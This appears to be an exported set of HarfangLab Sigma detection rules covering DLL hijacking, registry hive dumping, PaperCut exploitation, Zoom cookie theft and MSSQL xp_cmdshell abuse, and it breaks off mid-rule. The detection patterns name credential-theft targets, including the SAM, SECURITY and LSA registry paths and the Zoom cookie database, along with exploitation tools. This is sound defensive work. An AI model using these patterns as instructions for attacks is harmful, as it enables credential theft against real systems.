"content": "title: DLL Hijacking via rdvghelper.exe\nid: 4834c68c-17e1-41ea-aad1-8b8221b11796\ndescription: |\n Detects potential Windows DLL Hijacking via rdvghelper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdvghelper.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dwmapi.dll'\n - '\\WINSTA.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4834c68c-17e1-41ea-aad1-8b8221b11796",
"rule_name": "DLL Hijacking via rdvghelper.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rdvghelper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48702459-2abb-4d6e-8682-b9ca12feb9f0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075043Z",
"creation_date": "2026-03-23T11:45:34.075045Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075049Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/offsecginger/koadic/blob/main/data/implant/gather/hashdump_sam.js",
"https://attack.mitre.org/techniques/T1003/",
"https://lolbas-project.github.io/lolbas/Binaries/Reg/"
],
"name": "t1003_registry_extract.yml",
"content": "title: Sensitive Registry Hive Dumped\nid: 48702459-2abb-4d6e-8682-b9ca12feb9f0\ndescription: |\n Detects when reg.exe binary saves/dumps sensitive hives (SAM, SECURITY, SYSTEM)\n Koadic, among many others, uses this to dump the syskey.\n It is recommended to investigate the parent process for suspicious activities, as well to look for the subsequent unwanted usage of compromised credentials on others hosts.\nreferences:\n - https://github.com/offsecginger/koadic/blob/main/data/implant/gather/hashdump_sam.js\n - https://attack.mitre.org/techniques/T1003/\n - https://lolbas-project.github.io/lolbas/Binaries/Reg/\ndate: 2020/10/06\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Reg\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\reg.exe'\n - OriginalFileName: 'reg.exe'\n selection_commandline_action:\n CommandLine|contains:\n - ' save '\n - ' export '\n selection_commandline_hivename:\n CommandLine|contains:\n - '\\SAM '\n - '\\SAM\\ '\n - '\\SECURITY '\n - '\\SECURITY\\ '\n - '\\SECURITY\\policy\\secrets '\n - '\\SYSTEM ' # This hive is necessary for decrypting ntds.dit\n - '\\SYSTEM\\ '\n - '\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\JD '\n - '\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Skew1 '\n - '\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\GBG '\n - '\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Data '\n exclusion_rapid7:\n ParentImage: '?:\\Program Files\\Rapid7\\Insight Agent\\components\\insight_agent\\\\*\\ir_agent.exe'\n exclusion_trendmicro:\n CommandLine|endswith: '?:\\ProgramData\\Trend Micro\\Deep Security Agent\\\\*\\reg_gp_cmd.txt'\n\n exclusion_trendmicro_2:\n # C:\\Windows\\Temp\\qvwsbM1\\g1AxB76\\rp_main.exe\n ProcessGrandparentImage|endswith: '\\rp_main.exe'\n # reg export HKLM\\SOFTWARE\\Microsoft\\Security Center C:\\WINDOWS\\TEMP\\qvwsbM1\\g1AxB76\\wsc32.reg /reg:32\n # reg export HKLM\\SOFTWARE\\Microsoft\\Security Center C:\\WINDOWS\\TEMP\\waCxI8t\\VkBd5E8\\wsc64.reg /reg:64\n\n ProcessCommandLine|contains|all:\n - 'HKLM\\SOFTWARE\\Microsoft\\Security Center '\n - '\\wsc'\n - '/reg:'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48702459-2abb-4d6e-8682-b9ca12feb9f0",
"rule_name": "Sensitive Registry Hive Dumped",
"rule_description": "Detects when reg.exe binary saves/dumps sensitive hives (SAM, SECURITY, SYSTEM)\nKoadic, among many others, uses this to dump the syskey.\nIt is recommended to investigate the parent process for suspicious activities, as well to look for the subsequent unwanted usage of compromised credentials on others hosts.\n",
"rule_creation_date": "2020-10-06",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "487e1cf1-d661-410e-b8f6-9870b391d67e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588841Z",
"creation_date": "2026-03-23T11:45:34.588845Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588852Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pacjsworker.yml",
"content": "title: DLL Hijacking via pacjsworker.exe\nid: 487e1cf1-d661-410e-b8f6-9870b391d67e\ndescription: |\n Detects potential Windows DLL Hijacking via pacjsworker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pacjsworker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\WINHTTP.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "487e1cf1-d661-410e-b8f6-9870b391d67e",
"rule_name": "DLL Hijacking via pacjsworker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pacjsworker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "488f01c4-9b5e-4099-839c-aaa87e4afd58",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092317Z",
"creation_date": "2026-03-23T11:45:34.092320Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092324Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software",
"https://www.bleepingcomputer.com/news/security/exploit-released-for-papercut-flaw-abused-to-hijack-servers-patch-now/",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_papercut_exploitation.yml",
"content": "title: Suspicious Process Spawned by PaperCut Server\nid: 488f01c4-9b5e-4099-839c-aaa87e4afd58\ndescription: |\n Detects the execution of a suspicious process (such as script interpreters like PowerShell or W) by the PaperCut server process.\n This can be the result of the exploitation of the CVE-2023-27350 and CVE-2023-27351 vulnerabilities that allow an unauthenticated user to execute code as SYSTEM on the server.\n It is recommended to investigate the spawned process, its command-line and any scripts it might have executed to determine legitimacy.\nreferences:\n - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software\n - https://www.bleepingcomputer.com/news/security/exploit-released-for-papercut-flaw-abused-to-hijack-servers-patch-now/\n - https://attack.mitre.org/techniques/T1190/\ndate: 2023/04/26\nmodified: 2025/03/18\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-27350\n - classification.Windows.Exploit.CVE-2023-27351\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\pc-app.exe'\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\pwsh.exe'\n - '\\certutil.exe'\n - '\\wmic.exe'\n - '\\msiexec.exe'\n - '\\rundll32.exe'\n - '\\cscript.exe'\n - '\\wscript.exe'\n - '\\mshta.exe'\n - '\\regsvr32.exe'\n - '\\curl.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "488f01c4-9b5e-4099-839c-aaa87e4afd58",
"rule_name": "Suspicious Process Spawned by PaperCut Server",
"rule_description": "Detects the execution of a suspicious process (such as script interpreters like PowerShell or W) by the PaperCut server process.\nThis can be the result of the exploitation of the CVE-2023-27350 and CVE-2023-27351 vulnerabilities that allow an unauthenticated user to execute code as SYSTEM on the server.\nIt is recommended to investigate the spawned process, its command-line and any scripts it might have executed to determine legitimacy.\n",
"rule_creation_date": "2023-04-26",
"rule_modified_date": "2025-03-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "489d592b-0a46-401a-8296-cb95d0abe49a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598546Z",
"creation_date": "2026-03-23T11:45:34.598549Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598557Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1552_004_read_zoom_sensitive_files_macos.yml",
"content": "title: Suspicious Access to Zoom Sensitive Files\nid: 489d592b-0a46-401a-8296-cb95d0abe49a\ndescription: |\n Detects a suspicious access to Zoom files that hold cookies or sensitive files.\n Adversaries may steal Zoom application cookies and use them to gain access to the application without needing credentials.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1539/\ndate: 2024/06/18\nmodified: 2025/10/27\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path: '/Users/*/Library/Application Support/zoom.us/data/zoomus.enc.db'\n ProcessImage|contains: '?'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n exclusion_virusscanner:\n Image: '/Applications/VirusScannerPlus.app/Contents/MacOS/VirusScannerPlus'\n\n ### backup sofware ###\n exclusion_backup:\n Image:\n - '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n - '/Library/Oxibox/oxibackupd'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_birdagent:\n ProcessImage|endswith: '/bird_agent_stable'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: '_bird_python_dbg'\n\n exclusion_paloalto:\n Image: '/library/application support/paloaltonetworks/traps/bin/pmd'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'pmd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_image:\n ProcessImage:\n - '/sbin/md5'\n - '/usr/bin/rsync'\n - '/opt/homebrew/Cellar/rsync/*/bin/rsync'\n - '/Users/*/Applications/*/ripgrep/bin/rg'\n - '/usr/local/Cellar/ripgrep/*/bin/rg'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "489d592b-0a46-401a-8296-cb95d0abe49a",
"rule_name": "Suspicious Access to Zoom Sensitive Files",
"rule_description": "Detects a suspicious access to Zoom files that hold cookies or sensitive files.\nAdversaries may steal Zoom application cookies and use them to gain access to the application without needing credentials.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48a46575-c7c2-4961-a19b-0ccec37622d8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097023Z",
"creation_date": "2026-03-23T11:45:34.097025Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097030Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_edpcleanup.yml",
"content": "title: DLL Hijacking via edpcleanup.exe\nid: 48a46575-c7c2-4961-a19b-0ccec37622d8\ndescription: |\n Detects potential Windows DLL Hijacking via edpcleanup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'edpcleanup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DMCmnUtils.dll'\n - '\\DNSAPI.dll'\n - '\\FirewallAPI.dll'\n - '\\fwbase.dll'\n - '\\netutils.dll'\n - '\\policymanager.dll'\n - '\\profapi.dll'\n - '\\SspiCli.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48a46575-c7c2-4961-a19b-0ccec37622d8",
"rule_name": "DLL Hijacking via edpcleanup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via edpcleanup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48a4e8ec-4a97-4420-8fd1-9ce20191c569",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627719Z",
"creation_date": "2026-03-23T11:45:34.627721Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627726Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql",
"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1133/",
"https://attack.mitre.org/techniques/T1059/"
],
"name": "t1190_mssql_xp_cmdshell.yml",
"content": "title: Suspicious Execution via MSSQL Stored Procedure\nid: 48a4e8ec-4a97-4420-8fd1-9ce20191c569\ndescription: |\n Detects a suspicious command execution via MSSQL xp_cmdshell extended stored procedure.\n Attackers can use this stored procedure to execute any Windows command shell on the host with the same permissions of the Microsoft SQL Server instance.\n It is recommended to check other command executed by MSSQL and identify the source of the connection using authentication events.\nreferences:\n - https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql\n - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1133/\n - https://attack.mitre.org/techniques/T1059/\ndate: 2022/07/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.t1133\n - attack.execution\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\cmd.exe'\n CommandLine|contains: '\\cmd.exe /c '\n ParentImage|endswith: '\\sqlservr.exe'\n\n exclusion_commandline:\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /c ipconfig /all'\n - '?:\\Windows\\system32\\cmd.exe /c rename *'\n - '?:\\Windows\\system32\\cmd.exe /c DEL *'\n - '?:\\Windows\\system32\\cmd.exe /c RMDIR *'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files\\Microsoft SQL Server\\\\*\\Tools\\Binn\\sqllogship.exe *'\n - '?:\\Windows\\system32\\cmd.exe /c D:\\\\*'\n - 